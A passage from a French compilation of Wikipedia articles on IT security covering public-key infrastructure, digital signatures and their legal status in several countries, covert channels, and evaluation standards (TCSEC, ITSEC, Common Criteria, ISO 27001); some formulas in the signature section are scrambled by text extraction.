cette entité a pour mission de stocker de façon sécurisée les clés de chiffrement qui ont été générées par l'ICP, pour pouvoir les restaurer le cas échéant.

Les certificats numériques

Familles Usuellement, on distingue deux familles de certificats numériques : • les certificats de signature, utilisés pour signer des documents ou s'authentifier sur un site web, et • les certificats de chiffrement (les gens qui vous envoient des courriels utilisent la partie publique de votre certificat pour chiffrer le contenu que vous serez seul à pouvoir déchiffrer) Mais cette typologie n'est pas exhaustive ; un découpage plus orienté applicatif pourrait être envisagé. L'intérêt de la séparation des usages découle notamment des problématiques de séquestre de clés et de recouvrement. En effet, lorsqu'il y a chiffrement, il peut y avoir nécessité de recouvrer les informations chiffrées. Alors que lorsqu'il y a signature, il est indispensable de s'assurer que la clé privée n'est possédée que par une seule partie.

Nature et composition Un certificat électronique est une donnée publique. Suivant la technique des clés asymétriques, à chaque certificat électronique correspond une clé privée, qui doit être soigneusement protégée. Un certificat numérique porte les caractéristiques de son titulaire : si le porteur est un être humain, cela peut être son nom et son prénom, le nom de sa structure (par exemple, son entreprise ou son... État !) et de son entité d'appartenance. Si c'est un équipement informatique (comme une passerelle d'accès ou un serveur d'application sécurisé), le nom est remplacé par l'URI du service. À ces informations d'identification s'ajoute la partie publique du biclé. Infrastructure à clés publiques 293

L'ensemble de ces informations (comprenant la clé publique) est signé par l'autorité de certification de l'organisation émettrice. Cette autorité a la charge de : •• s'assurer que les informations portées par le certificat numérique sont correctes ; •• s'assurer qu'il n'existe, pour une personne et pour une même fonction, qu'un et un seul certificat valide à un moment donné. Le certificat numérique est donc, à l'échelle d'une organisation, un outil pour témoigner, de façon électroniquement sûre, d'une identité. L'usage conjoint des clés cryptographiques publiques (contenue dans le certificat) et privée (protégée par l'utilisateur, par exemple au sein d'une carte à puce), permet de disposer de fonctions de sécurité importante (cf. infra).

Gestion Un certificat numérique naît après qu'une demande de certificat a abouti. Une demande de certificat est un fichier numérique (appelé soit par son format, PKCS#10, soit par son équivalent fonctionnel, CSR pour Certificate Signing Request) qui est soumis à une autorité d'enregistrement par un utilisateur final ou par un administrateur pour le compte d'un utilisateur final. Cette demande de certificat est examinée par un Opérateur d'Autorité d'Enregistrement. Cette position est une responsabilité clé : c'est lui qui doit juger de la légitimité de la demande de l'utilisateur et accorder, ou non, la confiance de l'organisation. Pour se forger une opinion, l'Opérateur doit suivre une série de procédures, plus ou moins complètes, consignées dans deux documents de référence qui vont de pair avec la création d'une ICP qui sont la Politique de Certification (PC) et la Déclaration des Pratiques de Certification (DPC). Ces documents peuvent exiger, en fonction des enjeux de la certification, des vérifications plus ou moins poussées : rencontre en face-à-face, validation hiérarchique, etc. L'objectif de l'Opérateur d'AE est d'assurer que les informations fournies par l'utilisateur sont exactes et que ce dernier est bien autorisé à solliciter la création d'un certificat. Une fois son opinion formée, l'Opérateur de l'AE valide la demande ou la rejette. S'il la valide, la demande de certificat est alors adressée à l'Autorité de Certification (AC). L'AC vérifie que la demande a bien été validée par un Opérateur d'AE digne de confiance et, si c'est le cas, signe la CSR. Une fois signée, une CSR devient... un certificat. Le certificat, qui ne contient aucune information confidentielle, peut par exemple être publié dans un annuaire d'entreprise : c'est la tâche du Module de Publication, souvent proche de l'AC.

Modes de création Il existe deux façons distinctes de créer des certificats électroniques : le mode centralisé et le mode décentralisé. •• le mode décentralisé est le mode le plus courant : il consiste à faire créer, par l'utilisateur (ou, plus exactement par son logiciel ou carte à puce) le biclé cryptographique et de joindre la partie publique de la clef dans la CSR. L'Infrastructure n'a donc jamais connaissance de la clé privée de l'utilisateur, qui reste confinée sur son poste de travail ou dans sa carte à puce. • le mode centralisé consiste en la création du biclé par l'AC : au début du cycle de la demande, la CSR ne contient pas la clé publique, c'est l'AC qui la produit. Elle peut ainsi avoir de bonnes garanties sur la qualité de la clé (aléa) et peut... en détenir une copie protégée. En revanche, il faut transmettre à l'utilisateur certes son certificat (qui ne contient que des données publiques) mais aussi sa clé privée ! L'ensemble de ces deux données est un fichier créé sous le format PKCS#12. Son acheminement vers l'utilisateur doit être entrepris avec beaucoup de précaution et de sécurité, car toute personne mettant la main sur un fichier PKCS#12 peut détenir la clé de l'utilisateur. Le mode décentralisé est préconisé pour les certificats d'authentification (pour des questions de coût, parce qu'il est plus simple de refaire un certificat en décentralisé qu'à recouvrer une clé) et de signature (parce que les conditions d'exercice d'une signature juridiquement valide prévoit que le signataire doit être le seul possesseur de la clé : en mode décentralisé, l'ICP n'a jamais accès à la clé privée). Infrastructure à clés publiques 294

Le mode centralisé est préconisé pour les certificats de chiffrement, car, lorsqu'un utilisateur a perdu sa clé (par exemple, sa carte est perdue ou dysfonctionne), un opérateur peut, au terme d'une procédure de recouvrement, récupérer la clé de chiffrement et la lui remettre. Chose qui est impossible à faire avec des clés qui n'ont pas été séquestrées.

Scénario de fin de vie Il existe deux scénarios possibles de fin de vie d'un certificat numérique : •• le certificat numérique expire (chaque certificat numérique contient une date de « naissance » et une date de « péremption »). • le certificat est révoqué, pour quelque raison que ce soit (perte de la clé privée associée, etc.) et dans ce cas, l'identifiant du certificat numérique est ajouté à une liste de certificats révoqués (CRL pour Certificate Revocation List) pour informer les applications qu'elles ne doivent plus faire confiance à ce certificat. Il est aussi possible que les applications s'informent en quasi temps réel de l'état du certificat avec le protocole OCSP.

Précautions pour le déploiement Certains experts[Qui ?] pensent qu'aujourd'hui, dans un monde ouvert, il faut prendre certaines précautions avant de déployer une ICP, faute de quoi il y a des risques de pillage. Avant d'aborder les questions techniques, il faut par exemple se demander quels sont les utilisateurs, et si le cadre juridique est prêt. Lorsque l'entreprise échange beaucoup de données avec des partenaires en extranet, comme c'est le cas des entreprises étendues ou des pôles de compétitivité, la question de la sécurisation de l'interopérabilité se pose. Dans ces grandes communautés, l'information d'autorité doit être gérée dans des registres de métadonnées publics. Le certificat électronique peut alors être associé, dans le registre, à l'identifiant, afin de circonscrire le patrimoine informationnel partagé par la communauté de pratique. Voir par exemple : Dictionnaire de métadonnées [1] pour le référentiel des publications CNRS Par ailleurs, Il est conseillé de déployer les certificats sur support matériel (carte à puce) car le vol de certificat logiciel fait désormais partie des possibilités des malwares.

Références

[1] http:/ / www. ccsd. cnrs. fr/ IMG/ pdf/ DicoMetaHAL. pdf Signature numérique 295 Signature numérique

Pour les articles homonymes, voir Signature (homonymie). La signature numérique (parfois appelée signature électronique) est un mécanisme permettant de garantir l'intégrité d'un document électronique et d'en authentifier l'auteur, par analogie avec la signature manuscrite d'un document papier. Un mécanisme de signature numérique doit présenter les propriétés suivantes : •• Il doit permettre au lecteur d'un document d'identifier la personne ou l'organisme qui a apposé sa signature. •• Il doit garantir que le document n'a pas été altéré entre l'instant où l'auteur l'a signé et le moment où le lecteur le consulte. Pour cela, les conditions suivantes doivent être réunies : • Authentique : L'identité du signataire doit pouvoir être retrouvée de manière certaine. • Infalsifiable : La signature ne peut pas être falsifiée. Quelqu'un ne peut se faire passer pour un autre. • Non réutilisable: La signature n'est pas réutilisable. Elle fait partie du document signé et ne peut être déplacée sur un autre document. • Inaltérable : Un document signé est inaltérable. Une fois qu'il est signé, on ne peut plus le modifier. • Irrévocable : La personne qui a signé ne peut le nier. La signature électronique n'est devenue possible qu'avec la cryptographie asymétrique. Elle se différencie de la signature écrite par le fait qu'elle n'est pas visuelle, mais correspond à une suite de nombres.

Fonctionnement

Supposons que l'on dispose d'un algorithme de chiffrement asymétrique C (consulter liste). Notons A, la fonction D de chiffrement et A celle de C déchiffrement. La fonction A est capable de chiffrer une information D "claire". La fonction A ne peut que déchiffrer une information C C préalablement chiffrée par A. A est "fournie" par la clé privée, et n'est donc connue que du propriétaire D légitime. Quant à A, elle est "fournie" par la clé publique, et ainsi possiblement connue par tous.

Lorsque Alice souhaite signer un Diagramme montrant comment des données sont signées, puis vérifiées message M, elle utilise la procédure suivante. H hashage H (M) 1. Elle utilise une fonction de (ou de condensat), par exemple MD5 ou SHA. Le résultat A de cette opération, hash ou condensé, permet de s'assurer de l'intégrité du document, qu'il est bien entier et sans erreur. H (M) 2. Le condensé A peut être généré par n'importe qui. Afin d'assurer que c'est bien Alice qui a rédigé le M C message , ce condensé est chiffré par A. C (H (M)) S(M) 3. C'est ce condensé chiffré A A qui constitue la signature du message, aux côtés duquel elle est transmise. Signature numérique 296

Bob, qui connait la clé publique de Alice, reçoit le message M ainsi que la signature S(M) associée. Afin de vérifier son authenticité, la procédure suivante est employée : H (M) H 1. Le condensé B du message est généré au moyen de la même fonction (nécessité de mise en place d'un protocole de communication). 2. Parallèlement, la signature S(M) est déchiffrée au moyen de la clé publique. Le condensé censé avoir été généré D (S(M)) par Alice est ainsi retrouvé côté récepteur par A . H (M) 3. Le condensé B est comparé avec celui déchiffré depuis la signature. • En cas d'égalité, le message M est authentifié car seule Alice avec sa clé privée est capable de générer un condensé "compatible" avec sa clé publique et l'intégrité du message. •• Si les deux sont différents, soit le message a été altéré, soit il n'a pas été rédigé par Alice. La clé publique est diffusée par le biais de certificat. Un certificat inclut, outre la clé publique elle-même, des informations permettant d'identifier physiquement le propriétaire légitime de cette clé. Les certificats sont signés par des tiers de confiance (par exemple des autorités de certification). Ils authentifient une entité (IP, UUID, URI, personne physique ou morale, ...) qui détient la clef privée. Il ne s'agit donc pas exactement d'une carte d'identité numérique car un certificat peut ne garantir que certaines caractéristiques d'une entité, tandis que l'entité en elle-même peut changer fondamentalement.

Déclinaisons Historiquement, les premières signatures ont été individuelles. Ont été introduites par la suite : • Les signatures de groupe (en) où un membre ayant sa propre clé peut signer pour le groupe, le responsable du groupe (identifié par sa propre clé) pouvant seul établir qui a émis la signature. • Les signatures d'anneau (en), qui leur sont similaires, mais où il n'est plus possible d'identifier individuellement le signataire. Des variantes existent comme les K parmi N, où la signature est considérée comme valable si K membres du groupe parmi les N définis ont signé. Ce système sera utilisé par exemple lorsque l'autorisation de plusieurs services sera nécessaire pour déclencher un dispositif d'une gravité dépassant les prérogatives de chacun d'eux. Tel serait le cas par exemple pour une procédure de mise sur écoute téléphonique nécessitant les accords à la fois d'une instance autorisée de l'exécutif et d'une instance autorisée du législatif. On interdit ainsi l'usage de renseignements d'états à des fins personnelles, puisque le déblocage nécessite une coordination externe qui sera donc elle-même tracée.

Valeur légale dans l'Union européenne La législation européenne définit les conditions d'interopérabilité des signatures électroniques au sein de l'Union. Une condition majeure d'interopérabilité est que la signature électronique avancée doit être basée sur un certificat qualifié. Chaque pays membre doit rendre disponible une liste d'autorités de confiance (autorités de certification, autorités de certification des temps...) et la Commission européenne publie une liste reprenant ces listes de confiance nationales[1]. Seule la signature électronique qualifiée a même valeur légale qu'une signature manuscrite dans l'ensemble de l'Union européenne. Il s'agit d'une signature électronique avancée interopérable créée sur un dispositif sécurisé de création de signature (typiquement une carte à puce). À partir du 1er juillet 2013, c'est la version électronique du Journal officiel de l'Union européenne qui a valeur légale[2]. Cette édition électronique est publiée[3] sous forme d'une collection de documents au format PDF correspondant à toutes les versions linguistiques d'un même numéro, à laquelle s'ajoute un document XML assurant l'intégrité de l'ensemble. Ce document XML, qui contient un hash de chaque document PDF membre de ladite collection, est signé par une personne autorisée de l'Office des publications de l'Union européenne au moyen d'une Signature numérique 297

signature électronique qualifiée horodatée du jour de publication.

En France Depuis 2000, la signature électronique d'un document a en France la même valeur légale qu'une signature manuscrite, conformément aux textes suivants : • La loi n° 2000-230 du 13 mars 2000 [4] portant adaptation du droit de la preuve aux technologies de l'information et relative à la signature électronique ; • Son décret d'application [5] no 2001-272 du 30 mars 2001. Selon ce décret, un dispositif sécurisé de création de signature électronique doit être certifié conforme aux exigences définies plus haut : 1. Soit par le Premier ministre, dans les conditions prévues par le décret n° 2002-535 du 18 avril 2002 [6] relatif à l'évaluation et à la certification de la sécurité offerte par les produits et les systèmes des technologies de l'information. La délivrance du certificat de conformité est rendue publique. 2.2.Soit par un organisme désigné à cet effet par un État membre de l'Union européenne. La transposition complète de la Directive européenne 1999/93/CE a toutefois nécessité un processus plus long[7]. Depuis 2010, d'autre part, le concept de signature numérique, définie comme la conservation sous forme numérique d'une signature manuscrite produite via un écran tactile, a été introduite dans le droit français par l'article R 249-11 du code de procédure pénale

En Belgique Le législateur belge a transposé en 2001 la Directive européenne du 13 décembre 1999 sur un cadre communautaire pour les signatures électroniques. Cette transposition en droit belge s'est faite par l'adoption de deux lois: la Loi du 20 octobre 2000 [8] introduisant l’utilisation de moyens de télécommunication et de la signature électronique dans la procédure judiciaire et extrajudiciaire, M.B., 22 déc. 2000, p. 42698 qui modifie notamment l'article 1322 du Code civil et la Loi du 9 juillet 2001 [9] fixant certaines règles relatives au cadre juridique pour les signatures électroniques et les services de certification, M.B., 29 septembre 2001, p. 33070. C'est cette dernière loi qui explique la question des services de certification (P.S.C), leurs rôles et responsabilités ( voy. les annexes I, II et III de la loi). Voyez à ce sujet un article intéressant: GUINOTTE L., « La signature électronique après les lois du 20 octobre 2000 et du 9 juillet 2001 » [10], J.T., 2002, pp.556-561. • La signature électronique fait désormais partie du droit belge et a la même valeur juridique que la signature manuscrite. Bien qu’elle ait fait couler beaucoup d’encre du côté de la doctrine, on peut considérer qu’elle fait aujourd’hui l’objet d’une réglementation claire et rationnelle. L’ère de l’Internet et de l’électronique étant arrivée au sein du domaine juridique et il était logique que la signature y trouvât sa place. L’objectif premier de la directive européenne 1999/93/CE du 13 décembre 1999 sur un cadre communautaire pour les signatures électroniques était de favoriser les échanges commerciaux au-delà des frontières, d’instaurer une certaine confiance dans ces transactions et de conférer à l’ensemble une valeur juridique équivalente à celle de la signature manuscrite. Il semble que l’on peut considérer aujourd’hui que la boucle est bouclée et que les dernières zones d’ombre qui pourraient persister seront éclaircies par une future jurisprudence( qui est, pour le moment, quasi inexistante). Cependant, à l’heure actuelle, la signature électronique est assez lente à se répandre et bien que la Commission estime que tous les objectifs de la directive aient été atteints, le marché électronique reste restreint. On peut tout de même penser que ce n’est qu’un début et qu’une foule d’applications de la signature électronique reste à venir en vue d’améliorer et d’accélérer notre quotidien. Signature numérique 298

Valeur légale ailleurs dans le monde

En Suisse Article détaillé : SuisseID. La signature numérique (appelée signature électronique dans les textes législatifs) est reconnue en Suisse depuis 2003[11]. Elle équivaut, de ce fait, à la signature écrite qu'exige la loi pour certaines formes de contrat[12]. Peu utilisé en pratique[13], le Secrétariat d’État à l’Économie (SECO) lance en mai 2010 la « SuisseID [14] » pour promouvoir et faciliter l'accès à cette technologie pour les entreprises et les particuliers[15]. Censé faciliter les transactions d'affaire par voie électronique, le système vise aussi à permettre dès 2011 la commande, par internet, des documents officiels (notamment du casier judiciaire ou un extrait de l’office des poursuites) auprès des administrations publiques[16], conformément à la volonté de mise en place d'une « cyberadministration » pour faciliter l'accès à de tels documents et réduire la bureaucratie[17].

Au Québec Voir Loi concernant le cadre juridique des technologies de l'information [18]

Notes

[2] Règlement (UE) n° 216/2013 (http:/ / eur-lex. europa. eu/ LexUriServ/ LexUriServ. do?uri=OJ:L:2013:069:0001:0003:FR:PDF).

[3] Journal officiel de l'Union européenne (http:/ / new. eur-lex. europa. eu/ oj/ direct-access. html?locale=fr)

[4] http:/ / www. legifrance. gouv. fr/ WAspad/ UnTexteDeJorf?numjo=JUSX9900020L

[5] http:/ / www. legifrance. gouv. fr/ texteconsolide/ ARHCG. htm

[6] http:/ / www. legifrance. gouv. fr/ texteconsolide/ ADHZW. htm

[7] Signature électronique, point de situation, Paris, Direction Centrale de la Sécurité des Systèmes d'Information, 2004 (http:/ / www. ssi. gouv.

fr/ IMG/ pdf/ signature-memento-v0-94. pdf)

[8] http:/ / reflex. raadvst-consetat. be/ reflex/ pdf/ Mbbs/ 2000/ 12/ 22/ 69797. pdf

[9] http:/ / reflex. raadvst-consetat. be/ reflex/ pdf/ Mbbs/ 2001/ 09/ 29/ 72927. pdf

[10] http:/ / www. droit-technologie. org/ dossiers/ signature_electronique_belgique_lois_101000_et_090701. pdf

[11] Loi fédérale sur les services de certification dans le domaine de la signature électronique (http:/ / www. admin. ch/ ch/ f/ rs/ 943_03/ index. html)

[12] FF 2001 5424 (http:/ / www. admin. ch/ ch/ f/ ff/ 2001/ 5423. pdf)

[14] http:/ / www. suisseid. ch/ index. html?lang=fr

[16] La SuisseID et ses possibilités d’application (http:/ / www. suisseid. ch/ endkunden/ anwendungsbeispiele/ index. html?lang=fr)

[17] Cyberadministration (http:/ / www. seco. admin. ch/ themen/ 00476/ 03466/ index. html?lang=fr) sur le site du secrétariat d’État à l’Économie

[18] http:/ / www2. publicationsduquebec. gouv. qc. ca/ dynamicSearch/ telecharge. php?type=2& file=/ C_1_1/ C1_1. html

Liens externes

• (fr) Directive 1999/93/CE (http:/ / www. legifrance. gouv. fr/ WAspad/ UnDocument?base=LEX& nod=1RX99993EL13) sur un cadre communautaire pour les signatures électroniques

• (fr) Décret n°2001-272 (http:/ / www. legifrance. gouv. fr/ texteconsolide/ ARHCG. htm) du 30 mars 2001, pour l'application de l'article 1316-4 du code civil et relatif à la signature électronique

• (fr) Articles de l'ANSSI sur la signature électronique (http:/ / www. ssi. gouv. fr/ site_rubrique59. html)

• (fr) Un module d'auto-formation à la signature électronique élaboré par le centre de formation de l'ANSSI (http:/ /

www. securite-informatique. gouv. fr/ autoformations/ signature_elec/ index. html)

• Portail du droit • Portail de la cryptologie • Portail de la sécurité informatique Canal caché 299 Canal caché

Un canal caché (en anglais : covert channel) est en informatique un canal de communication entre deux ordinateurs qui utilise la bande passante d'un autre canal dans l'objectif de transmettre des informations sans l'autorisation ou la connaissance du propriétaire de l'information ou de l'administrateur du réseau.

Fonctionnement Les canaux cachés sont des entités dynamiques ; ils accaparent un emplacement mémoire sans nécessairement avoir besoin d'être stockés. De plus, sachant que l'unité informatique la plus basse connue est le bit, certains canaux cachés sont capables d'extraire des demi-bit (half-bit). Si pour un utilisateur classique, les antivirus et autres pare-feu sont souvent suffisants pour contrecarrer une attaque par un cheval de Troie, ils sont totalement impuissants devant un canal caché bruité.

Type de canal caché Il existe deux types de canaux cachés : •• Les storage channels : le processus émetteur modifie une donnée particulière, et le processus récepteur détecte et interprète la donnée modifiée pour recevoir indirectement des informations. •• Les timing channels : le processus émetteur module la durée d'une tâche effectuée par le processus récepteur, et le processus récepteur interprète cette variation comme une information. Il n'est pas simple de distinguer un storage d'un timing channel. Pour J. Wray[1], la différence est que, dans le cas d'un timing channel, le processus récepteur a besoin d'avoir accès à une horloge indépendante qui lui permet de dater les événements. Les storage channels sont exploitables sans l'aide de cette référence temporelle externe. La caractéristique propre d'un canal caché est la quantité d'informations qu'il peut envoyer. Pour qu'un Cheval de Troie soit opérationnel, il suffit qu'il puisse communiquer deux messages différents. Le type de canal binaire est appelé, par D. McCullough[2], un one-bit channel et permet à un cheval de Troie de transmettre n'importe quel message si le temps le lui permet. La présence d'un one-bit channel peut constituer une menace grave pour la confidentialité d'un système.

Canal caché probabiliste

Un one-bit channel peut être bruité c’est-à-dire que le processus récepteur reçoit une valeur différente ou égale au signal émis par le Cheval de Troie. Dans ce cas, le signal provenant du Cheval de Troie est ambigu.

Tant que le signal reçu est différent de celui émis par le Cheval de Troie, alors le Cheval de Troie peut toujours Aperçu d'un canal caché probabiliste transmettre n'importe quelle information en émettant de nouveau le message jusqu'à ce que le signal reçu soit identique à celui émis. Si le bruit est total, il n'y a plus de covert channel. Sinon, le Cheval de Troie peut encore envoyer un message plus ou moins bruité. Nous introduisons la notion de canal caché probabiliste. Canal caché 300

Notion de half-bit channel

D. McCullough introduit la notion de half-bit channel qui est un canal qui permet de ne communiquer qu'un seul message. L'information transmise n'est que partielle, cependant, avec deux half-bit channels, nous pouvons construire un one-bit channel.

Un exemple illustre bien cette notion, il s'agit des inputs bloquants. Objectif Le but du Cheval de Troie est de transférer le contenu du buffer BS (source secrète) dans le buffer non classifié BU. Hypothèses •• Nous supposons que les buffers BA et BB sont des buffers de taille finie. En effet, si le buffer était infini, alors le problème des inputs bloquants ne se poserait pas. •• Les processus ne savent pas combien de temps ils sont bloqués ni même s'ils ont été bloqués. • La seule chose que les processus savent : Si je ne suis pas bloqué alors, je sais que je ne suis pas bloqué. Il s'agit bien d'un half-bit channel. Construction Le processus A sature le buffer BA de messages. Le processus B fait de même avec le buffer BB. Le buffer BC sert à synchroniser les processus A et B avec le Cheval de Troie. Fonctionnement Lorsque les processus A et B sont bloqués (buffers respectifs BA et BB saturés), le Cheval de Troie lit un bit dans le buffer BS. Si le message lu est égal à 0, alors A est débloqué ; ce dernier écrit un 0 dans BU puis envoie un message dans BC pour informer le Cheval de Troie que le transfert est réalisé. Si le message lu est égal à 1, alors B est débloqué ; il écrit un 1 dans BU puis envoie un message dans BC pour informer le Cheval de Troie que le transfert est réalisé. Le Cheval de Troie a bien transféré le contenu de BS dans BU.

Références

[1][1]J. Wray. An Analysis of Covert Timing Channels. In IEEE symposium on security and privacy, Oakland, 1991. [2][2]D. McCullough. Covert channels and Degrees of Insecurity. In Proc. of the computer security foundations workshop, Franconia, 1988. 301

10-Normes et technologies

Trusted Computer System Evaluation Criteria

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Les Trusted Computer System Evaluation Criteria, expression abrégée en TCSEC, sont un ensemble de critères énoncés par le département de la Défense des États-Unis qui permettent d'évaluer la fiabilité de systèmes informatiques centralisés. On parle parfois de l'Orange Book (livre orange), d'après la couverture du livre. Il s'agit d'un cahier des charges définissant quatre degrés de sécurité, de A à D ; A est le niveau le plus sécurisé. En général, le niveau C2 est suffisant. Le micro-noyau Mach satisfait le niveau B3.

Annexes

Lien externe

• Trusted Computer System Evaluation Criteria [1]

• Portail de la sécurité informatique

Couverture d’un 'orange book de 1985.

Références

[1] http:/ / www. radium. ncsc. mil/ tpep/ library/ rainbow/ 5200. 28-STD. html Information Technology Security Evaluation Criteria 302 Information Technology Security Evaluation Criteria

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Information Technology Security Evaluation Criteria (ITSEC) est un standard pour la sécurité des systèmes d'information. Après le TCSEC, qui définit des standards au niveau « machine » (composants, logiciels, …), l'ITSEC définit une politique de sécurité du système d'information. L'ITSEC est le produit du travail commun de plusieurs pays de l'Union européenne en 1991.

Critères communs

Pour les articles homonymes, voir Critère. Common Criteria (CC) est un standard international (ISO/CEI 15408) pour la sécurité des systèmes d'information. Le nom complet du standard est Common Criteria for Information Technology Security Evaluation. En français, on emploie souvent l'expression Critères communs.

Description Les critères communs sont disponibles : •• en anglais : en version 3.1 de septembre 2006 (ainsi qu'en versions 2.1, 2.2, et 2.3) •• en français : en version 2.1 d'août 1999 Il existe aussi une version 3.0 mais elle n'a quasiment pas été utilisée. Accès à la documentation sur le site de l'ANSSI : Critères et méthodologie d'évaluation [1] Voir résumé sur le site de l'ANSSI : Références SSI [7]

Partie 1 : introduction et modèle général Cette partie décrit l'organisation générale de la norme et contient un glossaire pour les termes spécifiques. Voir détails sur le site de l'ANSSI : Introduction et modèle général [2] (version 2.1 en français, 76 pages)

Partie 2 : exigences fonctionnelles de sécurité Cette partie est un catalogue de fonctionnalités dont l'objectif est de fournir un langage structuré pour exprimer ce que doit faire un produit de sécurité. Voir détails sur le site de l'ANSSI : Exigences fonctionnelles de sécurité [3] (version 2.1 en français, 394 pages) Il existe 11 rubriques : 1.1.Audit de sécurité (FAU) 2.2.Communication (FCO) 3.3.Utilisation de la cryptographie (FCS) 4.4.Protection des données de l'utilisateur (FDP) 5.5.Identification et authentification (FIA) Critères communs 303

6.6.Gestion de la sécurité (FMT) 7.7.Protection de la vie privée (FPR) 8.8.Protection des fonctions de sécurité de la cible d'évaluation (FPT) 9.9.Utilisation des ressources (FRU) 10.10.Accès à la cible d'évaluation (FTA) 11.11.Chemins et canaux de confiance (FTP)

Partie 3 : exigences d'assurance de sécurité Cette partie est un catalogue d'exigences sur la documentation associé au produit évalué. Il s'agit principalement de •• la documentation de développement du produit (spécifications, conception, tests, etc), notamment pour les classes ADV et ATE; •• la documentation sur l'environnement de développement (ce qui est parfois appelé le «manuel qualité» de l'organisation, généralement une société commerciale), notamment pour la classe ALC •• et la documentation d'exploitation livrée avec le produit et indiquant comment l'utiliser, le configurer, etc, principalement pour la classe AGD. Il existe 10 classes dans les versions 2.x: 1.1.Évaluation d'un profil de protection (classe APE) 2.2.Évaluation d'une cible de sécurité (classe ASE) 3.3.Gestion de configuration (classe ACM) 4.4.Livraison et exploitation (classe ADO) 5.5.Développement (classe ADV) 6.6.Guides (classe AGD) 7.7.Support au cycle de vie (classe ALC) 8.8.Tests (classe ATE) 9.9.Estimation des vulnérabilités (classe AVA) 10.10.Maintenance de l'assurance (classe AMA) L'organisation des exigences a été améliorée en version 3.1: les classes sont un peu différentes mais les détails sont similaires. Voir détails sur le site de l'ANSSI : Exigences d'assurance de sécurité [4] (version 2.1 en français, 236 pages)

Méthodologie d'évaluation Voir détails sur le site de l'ANSSI : Evaluation methodology [5] (version 3.1 en anglais)

Concepts clés TOE (Target of Evaluation) La «cible d'évaluation», est le produit soumis à l'évaluation. Les critères sont censés être génériques mais ils ne s'appliquent correctement que s'il s'agit d'un logiciel. SFR (Security functional requirements) Les «exigences fonctionnelles de sécurité» désignent l'ensemble des fonctionnalités de la TOE, elles sont normalement choisies dans le catalogue de la partie 2. PP (Protection profile) C'est une description dans une forme standardisée d'un besoin en sécurité et de la manière de le satisfaire à partir des fonctions du catalogue. Cf. l'article Profil de Protection. ST (Security Target) Critères communs 304

La «cible de sécurité» est une description dans une forme standardisée, très similaire à celle d'un profil, de l'utilité annoncée d'un produit de sécurité et des fonctionnalités qu'il fournit. Une cible peut être construite à partir d'un ou plusieurs profils de protection. (Inversement, on peut considérer qu'un profil est une cible indépendante d'un produit.)

Systèmes concernés Les systèmes d'exploitation ("Operating Systems"). Les dispositifs dédiés aux communications : •• Gestionnaires de réseaux, • Routeurs, commutateurs réseau ("switchs"), hubs, • Les réseaux privés virtuels (VPN). Les systèmes consacrés à la sécurité informatique • Les systèmes d'accès (accès internet,...) • Les systèmes d'authentification, infrastructure à clés publiques (PKI)/KMI • Les pare-feu • Les systèmes de détection d'intrusion (IDS) • Les logiciels anti-virus • Les contrôles biométriques. Les cartes à puces Historiquement, le type de produit privilégié par les Critères et ses ancêtres est les systèmes d'exploitation centralisés. Aujourd'hui (en 2007-2008), le type de produit le plus souvent évalué est la carte à puce.

Niveaux de l'évaluation Article détaillé : Evaluation Assurance Level. Un niveau d'évaluation correspond à une sélection d'un paquet d'assurance, i.e. un ensemble de «composant» de la partie 3. Les niveaux standards sont cumulatifs, c'est-à-dire que toutes les exigences du niveau n sont comprises dans le niveau n+1. Chaque pays peut également définir ses propres paquets d'assurance. Les Critères Communs définissent 7 niveaux d'assurance de l'évaluation. La liste ci-dessous donne l'objectif résumé de chaque niveau. •• EAL1 : testé fonctionnellement •• EAL2 : testé structurellement •• EAL3 : testé et vérifié méthodiquement •• EAL4 : conçu, testé et vérifié méthodiquement, •• EAL5 : conçu de façon semi-formelle et testé •• EAL6 : conception vérifiée de façon semi-formelle et testé •• EAL7 : conception vérifiée de façon formelle et testée. Critères communs 305

Mise en œuvre

En France C'est l'ANSSI qui met en œuvre le schéma de certification français. Cet organisme, rattaché au Premier ministre, est chargé de la certification de la sécurité des produits évalués par les CESTI.

En Europe En Europe, les Information Technology Security Evaluation Criteria (ITSEC) sont un standard pour la sécurité des systèmes d'information, qui s'intéresse plus particulièrement à la politique de sécurité des systèmes d'information. Les ITSEC sont le produit du travail commun de plusieurs pays de l'Union européenne, en 1991. Ces critères sont désormais obsolètes et sont censés être remplacés par les critères communs. Ils sont toutefois encore utilisés dans un cadre gouvernemental. Voir : Information Technology Security Evaluation Criteria (ITSEC)

Aux États-Unis Aux États-Unis, les critères d'évaluation sont définis par la National Security Agency (NSA), agence du département de la défense, au niveau des matériels informatiques et des logiciels. • Organisme de la NSA chargé de l'évaluation : NIAP [6] • Trusted Computer System Evaluation Criteria (TCSEC) La société Mitre est fournisseur du département de la défense sur ces questions.

Voir : http:/ / www. mitre. org/ news/ the_edge/ february_01/ highlights. html

Liens externes • (fr) Certification Critères Communs [7] • (fr) Guide sur les critères communs [8] • (fr) Difference entre certification et qualification [9] • (en) Common criteria portal [10]

• (en) http:/ / www. infosyssec. org/ infosyssec/ security/ secpol1. htm

• Portail de l’informatique • Portail de la sécurité de l’information • Portail de la sécurité informatique

Références

[1] http:/ / www. ssi. gouv. fr/ site_article135. html

[2] http:/ / www. ssi. gouv. fr/ IMG/ pdf/ CCpart1v21-fr. pdf

[3] http:/ / www. ssi. gouv. fr/ IMG/ pdf/ CCpart2v21-fr. pdf

[4] http:/ / www. ssi. gouv. fr/ IMG/ pdf/ CCpart3v21-fr. pdf

[5] http:/ / www. ssi. gouv. fr/ IMG/ pdf/ CEMv3-1r1. pdf

[6] http:/ / niap. bahialab. com/

[7] http:/ / www. ssi. gouv. fr/ fr/ certification-qualification/ cc/

[8] http:/ / www. guideinformatique. com/ fiche-criteres_communs_iso_15408-756. htm

[9] http:/ / blogs. cryptolog. com/ fr/ 2012/ 03/ labellisation-de-la-securite-quelle-difference-entre-certification-et-qualification. html

[10] http:/ / www. commoncriteriaportal. org/ ISO/CEI 27001 306 ISO/CEI 27001

Suite ISO/CEI 27000

• ISO/CEI 27000:2012 • ISO/CEI 27001:2005 • ISO/CEI 27002:2005 • ISO/CEI 27003:2010 • ISO/CEI 27004:2009 • ISO/CEI 27005:2011 • ISO/CEI 27006:2011 • ISO/CEI 27007:2011 • ISO/CEI 27008:2011 • ISO/CEI 27011:2008 • ISO/CEI 27013:2012 • ISO/CEI 27799:2008 [1] modifier

